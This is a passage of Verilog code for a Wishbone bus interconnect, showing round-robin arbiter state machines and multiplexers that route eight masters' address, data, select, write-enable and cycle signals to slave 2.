                    if ( s2_msel_arb2_req[6] ) 
                    begin
                        s2_msel_arb2_next_state = s2_msel_arb2_grant6;
                    end
                    else
                    begin 
                        if ( s2_msel_arb2_req[7] ) 
                        begin
                            s2_msel_arb2_next_state = s2_msel_arb2_grant7;
                        end
                        else
                        begin 
                            if ( s2_msel_arb2_req[0] ) 
                            begin
                                s2_msel_arb2_next_state = s2_msel_arb2_grant0;
                            end
                            else
                            begin 
                                if ( s2_msel_arb2_req[1] ) 
                                begin
                                    s2_msel_arb2_next_state = s2_msel_arb2_grant1;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb2_req[2] ) 
                                    begin
                                        s2_msel_arb2_next_state = s2_msel_arb2_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb2_req[3] ) 
                                        begin
                                            s2_msel_arb2_next_state = s2_msel_arb2_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb2_grant5:
        begin
            if (  !( s2_msel_arb2_req[5]) | 1'b0 ) 
            begin
                if ( s2_msel_arb2_req[6] ) 
                begin
                    s2_msel_arb2_next_state = s2_msel_arb2_grant6;
                end
                else
                begin 
                    if ( s2_msel_arb2_req[7] ) 
                    begin
                        s2_msel_arb2_next_state = s2_msel_arb2_grant7;
                    end
                    else
                    begin 
                        if ( s2_msel_arb2_req[0] ) 
                        begin
                            s2_msel_arb2_next_state = s2_msel_arb2_grant0;
                        end
                        else
                        begin 
                            if ( s2_msel_arb2_req[1] ) 
                            begin
                                s2_msel_arb2_next_state = s2_msel_arb2_grant1;
                            end
                            else
                            begin 
                                if ( s2_msel_arb2_req[2] ) 
                                begin
                                    s2_msel_arb2_next_state = s2_msel_arb2_grant2;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb2_req[3] ) 
                                    begin
                                        s2_msel_arb2_next_state = s2_msel_arb2_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb2_req[4] ) 
                                        begin
                                            s2_msel_arb2_next_state = s2_msel_arb2_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb2_grant6:
        begin
            if (  !( s2_msel_arb2_req[6]) | 1'b0 ) 
            begin
                if ( s2_msel_arb2_req[7] ) 
                begin
                    s2_msel_arb2_next_state = s2_msel_arb2_grant7;
                end
                else
                begin 
                    if ( s2_msel_arb2_req[0] ) 
                    begin
                        s2_msel_arb2_next_state = s2_msel_arb2_grant0;
                    end
                    else
                    begin 
                        if ( s2_msel_arb2_req[1] ) 
                        begin
                            s2_msel_arb2_next_state = s2_msel_arb2_grant1;
                        end
                        else
                        begin 
                            if ( s2_msel_arb2_req[2] ) 
                            begin
                                s2_msel_arb2_next_state = s2_msel_arb2_grant2;
                            end
                            else
                            begin 
                                if ( s2_msel_arb2_req[3] ) 
                                begin
                                    s2_msel_arb2_next_state = s2_msel_arb2_grant3;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb2_req[4] ) 
                                    begin
                                        s2_msel_arb2_next_state = s2_msel_arb2_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb2_req[5] ) 
                                        begin
                                            s2_msel_arb2_next_state = s2_msel_arb2_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb2_grant7:
        begin
            if (  !( s2_msel_arb2_req[7]) | 1'b0 ) 
            begin
                if ( s2_msel_arb2_req[0] ) 
                begin
                    s2_msel_arb2_next_state = s2_msel_arb2_grant0;
                end
                else
                begin 
                    if ( s2_msel_arb2_req[1] ) 
                    begin
                        s2_msel_arb2_next_state = s2_msel_arb2_grant1;
                    end
                    else
                    begin 
                        if ( s2_msel_arb2_req[2] ) 
                        begin
                            s2_msel_arb2_next_state = s2_msel_arb2_grant2;
                        end
                        else
                        begin 
                            if ( s2_msel_arb2_req[3] ) 
                            begin
                                s2_msel_arb2_next_state = s2_msel_arb2_grant3;
                            end
                            else
                            begin 
                                if ( s2_msel_arb2_req[4] ) 
                                begin
                                    s2_msel_arb2_next_state = s2_msel_arb2_grant4;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb2_req[5] ) 
                                    begin
                                        s2_msel_arb2_next_state = s2_msel_arb2_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb2_req[6] ) 
                                        begin
                                            s2_msel_arb2_next_state = s2_msel_arb2_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s2_msel_arb3_req = { ( s2_msel_req[7] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[15] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[14] ) ) } == 2'd3 ) ), ( s2_msel_req[6] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[13] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[12] ) ) } == 2'd3 ) ), ( s2_msel_req[5] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[11] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[10] ) ) } == 2'd3 ) ), ( s2_msel_req[4] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[9] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[8] ) ) } == 2'd3 ) ), ( s2_msel_req[3] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[7] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[6] ) ) } == 2'd3 ) ), ( s2_msel_req[2] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[5] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[4] ) ) } == 2'd3 ) ), ( s2_msel_req[1] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[3] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[2] ) ) } == 2'd3 ) ), ( s2_msel_req[0] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[1] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[0] ) ) } == 2'd3 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s2_msel_arb3_state <= s2_msel_arb3_grant0;
        end
        else
        begin 
            s2_msel_arb3_state <= s2_msel_arb3_next_state;
        end
    end
    always @ (  s2_msel_arb3_state or  { ( s2_msel_req[7] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[15] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[14] ) ) } == 2'd3 ) ), ( s2_msel_req[6] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[13] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[12] ) ) } == 2'd3 ) ), ( s2_msel_req[5] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[11] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[10] ) ) } == 2'd3 ) ), ( s2_msel_req[4] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[9] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[8] ) ) } == 2'd3 ) ), ( s2_msel_req[3] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[7] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[6] ) ) } == 2'd3 ) ), ( s2_msel_req[2] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[5] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[4] ) ) } == 2'd3 ) ), ( s2_msel_req[1] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[3] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[2] ) ) } == 2'd3 ) ), ( s2_msel_req[0] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[1] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[0] ) ) } == 2'd3 ) ) } or  1'b0)
    begin
        s2_msel_arb3_next_state = s2_msel_arb3_state;
        case ( s2_msel_arb3_state ) 
        s2_msel_arb3_grant0:
        begin
            if (  !( s2_msel_arb3_req[0]) | 1'b0 ) 
            begin
                if ( s2_msel_arb3_req[1] ) 
                begin
                    s2_msel_arb3_next_state = s2_msel_arb3_grant1;
                end
                else
                begin 
                    if ( s2_msel_arb3_req[2] ) 
                    begin
                        s2_msel_arb3_next_state = s2_msel_arb3_grant2;
                    end
                    else
                    begin 
                        if ( s2_msel_arb3_req[3] ) 
                        begin
                            s2_msel_arb3_next_state = s2_msel_arb3_grant3;
                        end
                        else
                        begin 
                            if ( s2_msel_arb3_req[4] ) 
                            begin
                                s2_msel_arb3_next_state = s2_msel_arb3_grant4;
                            end
                            else
                            begin 
                                if ( s2_msel_arb3_req[5] ) 
                                begin
                                    s2_msel_arb3_next_state = s2_msel_arb3_grant5;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb3_req[6] ) 
                                    begin
                                        s2_msel_arb3_next_state = s2_msel_arb3_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb3_req[7] ) 
                                        begin
                                            s2_msel_arb3_next_state = s2_msel_arb3_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb3_grant1:
        begin
            if (  !( s2_msel_arb3_req[1]) | 1'b0 ) 
            begin
                if ( s2_msel_arb3_req[2] ) 
                begin
                    s2_msel_arb3_next_state = s2_msel_arb3_grant2;
                end
                else
                begin 
                    if ( s2_msel_arb3_req[3] ) 
                    begin
                        s2_msel_arb3_next_state = s2_msel_arb3_grant3;
                    end
                    else
                    begin 
                        if ( s2_msel_arb3_req[4] ) 
                        begin
                            s2_msel_arb3_next_state = s2_msel_arb3_grant4;
                        end
                        else
                        begin 
                            if ( s2_msel_arb3_req[5] ) 
                            begin
                                s2_msel_arb3_next_state = s2_msel_arb3_grant5;
                            end
                            else
                            begin 
                                if ( s2_msel_arb3_req[6] ) 
                                begin
                                    s2_msel_arb3_next_state = s2_msel_arb3_grant6;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb3_req[7] ) 
                                    begin
                                        s2_msel_arb3_next_state = s2_msel_arb3_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb3_req[0] ) 
                                        begin
                                            s2_msel_arb3_next_state = s2_msel_arb3_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb3_grant2:
        begin
            if (  !( s2_msel_arb3_req[2]) | 1'b0 ) 
            begin
                if ( s2_msel_arb3_req[3] ) 
                begin
                    s2_msel_arb3_next_state = s2_msel_arb3_grant3;
                end
                else
                begin 
                    if ( s2_msel_arb3_req[4] ) 
                    begin
                        s2_msel_arb3_next_state = s2_msel_arb3_grant4;
                    end
                    else
                    begin 
                        if ( s2_msel_arb3_req[5] ) 
                        begin
                            s2_msel_arb3_next_state = s2_msel_arb3_grant5;
                        end
                        else
                        begin 
                            if ( s2_msel_arb3_req[6] ) 
                            begin
                                s2_msel_arb3_next_state = s2_msel_arb3_grant6;
                            end
                            else
                            begin 
                                if ( s2_msel_arb3_req[7] ) 
                                begin
                                    s2_msel_arb3_next_state = s2_msel_arb3_grant7;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb3_req[0] ) 
                                    begin
                                        s2_msel_arb3_next_state = s2_msel_arb3_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb3_req[1] ) 
                                        begin
                                            s2_msel_arb3_next_state = s2_msel_arb3_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb3_grant3:
        begin
            if (  !( s2_msel_arb3_req[3]) | 1'b0 ) 
            begin
                if ( s2_msel_arb3_req[4] ) 
                begin
                    s2_msel_arb3_next_state = s2_msel_arb3_grant4;
                end
                else
                begin 
                    if ( s2_msel_arb3_req[5] ) 
                    begin
                        s2_msel_arb3_next_state = s2_msel_arb3_grant5;
                    end
                    else
                    begin 
                        if ( s2_msel_arb3_req[6] ) 
                        begin
                            s2_msel_arb3_next_state = s2_msel_arb3_grant6;
                        end
                        else
                        begin 
                            if ( s2_msel_arb3_req[7] ) 
                            begin
                                s2_msel_arb3_next_state = s2_msel_arb3_grant7;
                            end
                            else
                            begin 
                                if ( s2_msel_arb3_req[0] ) 
                                begin
                                    s2_msel_arb3_next_state = s2_msel_arb3_grant0;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb3_req[1] ) 
                                    begin
                                        s2_msel_arb3_next_state = s2_msel_arb3_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb3_req[2] ) 
                                        begin
                                            s2_msel_arb3_next_state = s2_msel_arb3_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb3_grant4:
        begin
            if (  !( s2_msel_arb3_req[4]) | 1'b0 ) 
            begin
                if ( s2_msel_arb3_req[5] ) 
                begin
                    s2_msel_arb3_next_state = s2_msel_arb3_grant5;
                end
                else
                begin 
                    if ( s2_msel_arb3_req[6] ) 
                    begin
                        s2_msel_arb3_next_state = s2_msel_arb3_grant6;
                    end
                    else
                    begin 
                        if ( s2_msel_arb3_req[7] ) 
                        begin
                            s2_msel_arb3_next_state = s2_msel_arb3_grant7;
                        end
                        else
                        begin 
                            if ( s2_msel_arb3_req[0] ) 
                            begin
                                s2_msel_arb3_next_state = s2_msel_arb3_grant0;
                            end
                            else
                            begin 
                                if ( s2_msel_arb3_req[1] ) 
                                begin
                                    s2_msel_arb3_next_state = s2_msel_arb3_grant1;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb3_req[2] ) 
                                    begin
                                        s2_msel_arb3_next_state = s2_msel_arb3_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb3_req[3] ) 
                                        begin
                                            s2_msel_arb3_next_state = s2_msel_arb3_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb3_grant5:
        begin
            if (  !( s2_msel_arb3_req[5]) | 1'b0 ) 
            begin
                if ( s2_msel_arb3_req[6] ) 
                begin
                    s2_msel_arb3_next_state = s2_msel_arb3_grant6;
                end
                else
                begin 
                    if ( s2_msel_arb3_req[7] ) 
                    begin
                        s2_msel_arb3_next_state = s2_msel_arb3_grant7;
                    end
                    else
                    begin 
                        if ( s2_msel_arb3_req[0] ) 
                        begin
                            s2_msel_arb3_next_state = s2_msel_arb3_grant0;
                        end
                        else
                        begin 
                            if ( s2_msel_arb3_req[1] ) 
                            begin
                                s2_msel_arb3_next_state = s2_msel_arb3_grant1;
                            end
                            else
                            begin 
                                if ( s2_msel_arb3_req[2] ) 
                                begin
                                    s2_msel_arb3_next_state = s2_msel_arb3_grant2;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb3_req[3] ) 
                                    begin
                                        s2_msel_arb3_next_state = s2_msel_arb3_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb3_req[4] ) 
                                        begin
                                            s2_msel_arb3_next_state = s2_msel_arb3_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb3_grant6:
        begin
            if (  !( s2_msel_arb3_req[6]) | 1'b0 ) 
            begin
                if ( s2_msel_arb3_req[7] ) 
                begin
                    s2_msel_arb3_next_state = s2_msel_arb3_grant7;
                end
                else
                begin 
                    if ( s2_msel_arb3_req[0] ) 
                    begin
                        s2_msel_arb3_next_state = s2_msel_arb3_grant0;
                    end
                    else
                    begin 
                        if ( s2_msel_arb3_req[1] ) 
                        begin
                            s2_msel_arb3_next_state = s2_msel_arb3_grant1;
                        end
                        else
                        begin 
                            if ( s2_msel_arb3_req[2] ) 
                            begin
                                s2_msel_arb3_next_state = s2_msel_arb3_grant2;
                            end
                            else
                            begin 
                                if ( s2_msel_arb3_req[3] ) 
                                begin
                                    s2_msel_arb3_next_state = s2_msel_arb3_grant3;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb3_req[4] ) 
                                    begin
                                        s2_msel_arb3_next_state = s2_msel_arb3_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb3_req[5] ) 
                                        begin
                                            s2_msel_arb3_next_state = s2_msel_arb3_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb3_grant7:
        begin
            if (  !( s2_msel_arb3_req[7]) | 1'b0 ) 
            begin
                if ( s2_msel_arb3_req[0] ) 
                begin
                    s2_msel_arb3_next_state = s2_msel_arb3_grant0;
                end
                else
                begin 
                    if ( s2_msel_arb3_req[1] ) 
                    begin
                        s2_msel_arb3_next_state = s2_msel_arb3_grant1;
                    end
                    else
                    begin 
                        if ( s2_msel_arb3_req[2] ) 
                        begin
                            s2_msel_arb3_next_state = s2_msel_arb3_grant2;
                        end
                        else
                        begin 
                            if ( s2_msel_arb3_req[3] ) 
                            begin
                                s2_msel_arb3_next_state = s2_msel_arb3_grant3;
                            end
                            else
                            begin 
                                if ( s2_msel_arb3_req[4] ) 
                                begin
                                    s2_msel_arb3_next_state = s2_msel_arb3_grant4;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb3_req[5] ) 
                                    begin
                                        s2_msel_arb3_next_state = s2_msel_arb3_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb3_req[6] ) 
                                        begin
                                            s2_msel_arb3_next_state = s2_msel_arb3_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    always @ (  s2_msel_pri_out or  s2_msel_arb0_state or  s2_msel_arb1_state)
    begin
        if ( s2_msel_pri_out[0] ) 
        begin
            s2_msel_sel1 = s2_msel_arb1_state;
        end
        else
        begin 
            s2_msel_sel1 = s2_msel_arb0_state;
        end
    end
    always @ (  s2_msel_pri_out or  s2_msel_arb0_state or  s2_msel_arb1_state or  s2_msel_arb2_state or  s2_msel_arb3_state)
    begin
        case ( s2_msel_pri_out ) 
        2'd0:
        begin
            s2_msel_sel2 = s2_msel_arb0_state;
        end
        2'd1:
        begin
            s2_msel_sel2 = s2_msel_arb1_state;
        end
        2'd2:
        begin
            s2_msel_sel2 = s2_msel_arb2_state;
        end
        2'd3:
        begin
            s2_msel_sel2 = s2_msel_arb3_state;
        end
        endcase
    end
    assign s2_mast_sel = ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) );
    always @ (  ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) or  m0_wb_addr_i or  m1_wb_addr_i or  m2_wb_addr_i or  m3_wb_addr_i or  m4_wb_addr_i or  m5_wb_addr_i or  m6_wb_addr_i or  m7_wb_addr_i)
    begin
        case ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s2_wb_addr_o = m0_wb_addr_i;
        end
        3'd1:
        begin
            s2_wb_addr_o = m1_wb_addr_i;
        end
        3'd2:
        begin
            s2_wb_addr_o = m2_wb_addr_i;
        end
        3'd3:
        begin
            s2_wb_addr_o = m3_wb_addr_i;
        end
        3'd4:
        begin
            s2_wb_addr_o = m4_wb_addr_i;
        end
        3'd5:
        begin
            s2_wb_addr_o = m5_wb_addr_i;
        end
        3'd6:
        begin
            s2_wb_addr_o = m6_wb_addr_i;
        end
        3'd7:
        begin
            s2_wb_addr_o = m7_wb_addr_i;
        end
        endcase
    end
    always @ (  ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) or  m0_wb_sel_i or  m1_wb_sel_i or  m2_wb_sel_i or  m3_wb_sel_i or  m4_wb_sel_i or  m5_wb_sel_i or  m6_wb_sel_i or  m7_wb_sel_i)
    begin
        case ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s2_wb_sel_o = m0_wb_sel_i;
        end
        3'd1:
        begin
            s2_wb_sel_o = m1_wb_sel_i;
        end
        3'd2:
        begin
            s2_wb_sel_o = m2_wb_sel_i;
        end
        3'd3:
        begin
            s2_wb_sel_o = m3_wb_sel_i;
        end
        3'd4:
        begin
            s2_wb_sel_o = m4_wb_sel_i;
        end
        3'd5:
        begin
            s2_wb_sel_o = m5_wb_sel_i;
        end
        3'd6:
        begin
            s2_wb_sel_o = m6_wb_sel_i;
        end
        3'd7:
        begin
            s2_wb_sel_o = m7_wb_sel_i;
        end
        endcase
    end
    always @ (  ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) or  m0_wb_data_i or  m1_wb_data_i or  m2_wb_data_i or  m3_wb_data_i or  m4_wb_data_i or  m5_wb_data_i or  m6_wb_data_i or  m7_wb_data_i)
    begin
        case ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s2_wb_data_o = m0_wb_data_i;
        end
        3'd1:
        begin
            s2_wb_data_o = m1_wb_data_i;
        end
        3'd2:
        begin
            s2_wb_data_o = m2_wb_data_i;
        end
        3'd3:
        begin
            s2_wb_data_o = m3_wb_data_i;
        end
        3'd4:
        begin
            s2_wb_data_o = m4_wb_data_i;
        end
        3'd5:
        begin
            s2_wb_data_o = m5_wb_data_i;
        end
        3'd6:
        begin
            s2_wb_data_o = m6_wb_data_i;
        end
        3'd7:
        begin
            s2_wb_data_o = m7_wb_data_i;
        end
        endcase
    end
    assign s2_m0_data_o = s2_data_i;
    assign s2_m1_data_o = s2_data_i;
    assign s2_m2_data_o = s2_data_i;
    assign s2_m3_data_o = s2_data_i;
    assign s2_m4_data_o = s2_data_i;
    assign s2_m5_data_o = s2_data_i;
    assign s2_m6_data_o = s2_data_i;
    assign s2_m7_data_o = s2_data_i;
    always @ (  ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) or  m0_wb_we_i or  m1_wb_we_i or  m2_wb_we_i or  m3_wb_we_i or  m4_wb_we_i or  m5_wb_we_i or  m6_wb_we_i or  m7_wb_we_i)
    begin
        case ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s2_wb_we_o = m0_wb_we_i;
        end
        3'd1:
        begin
            s2_wb_we_o = m1_wb_we_i;
        end
        3'd2:
        begin
            s2_wb_we_o = m2_wb_we_i;
        end
        3'd3:
        begin
            s2_wb_we_o = m3_wb_we_i;
        end
        3'd4:
        begin
            s2_wb_we_o = m4_wb_we_i;
        end
        3'd5:
        begin
            s2_wb_we_o = m5_wb_we_i;
        end
        3'd6:
        begin
            s2_wb_we_o = m6_wb_we_i;
        end
        3'd7:
        begin
            s2_wb_we_o = m7_wb_we_i;
        end
        endcase
    end
    always @ (  posedge clk_i)
    begin
        s2_m0_cyc_r <= m0_s2_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s2_m1_cyc_r <= m1_s2_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s2_m2_cyc_r <= m2_s2_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s2_m3_cyc_r <= m3_s2_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s2_m4_cyc_r <= m4_s2_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s2_m5_cyc_r <= m5_s2_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s2_m6_cyc_r <= m6_s2_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s2_m7_cyc_r <= m7_s2_cyc_o;
    end
    always @ (  ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) or  m0_s2_cyc_o or  m1_s2_cyc_o or  m2_s2_cyc_o or  m3_s2_cyc_o or  m4_s2_cyc_o or  m5_s2_cyc_o or  m6_s2_cyc_o or  m7_s2_cyc_o or  s2_m0_cyc_r or  s2_m1_cyc_r or  s2_m2_cyc_r or  s2_m3_cyc_r or  s2_m4_cyc_r or  s2_m5_cyc_r or  s2_m6_cyc_r or  s2_m7_cyc_r)
    begin
        case ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s2_wb_cyc_o = ( m0_s2_cyc_o & s2_m0_cyc_r );
        end
        3'd1:
        begin
            s2_wb_cyc_o = ( m1_s2_cyc_o & s2_m1_cyc_r );
        end
        3'd2:
        begin
            s2_wb_cyc_o = ( m2_s2_cyc_o & s2_m2_cyc_r );
        end
        3'd3:
        begin
            s2_wb_cyc_o = ( m3_s2_cyc_o & s2_m3_cyc_r );
        end
        3'd4:
        begin
            s2_wb_cyc_o = ( m4_s2_cyc_o & s2_m4_cyc_r );
        end
        3'd5:
        begin
            s2_wb_cyc_o = ( m5_s2_cyc_o & s2_m5_cyc_r );
        end
        3'd6:
        begin
            s2_wb_cyc_o = ( m6_s2_cyc_o & s2_m6_cyc_r );
        end
        3'd7:
        begin
            s2_wb_cyc_o = ( m7_s2_cyc_o & s2_m7_cyc_r );
        end
        endcase
    end
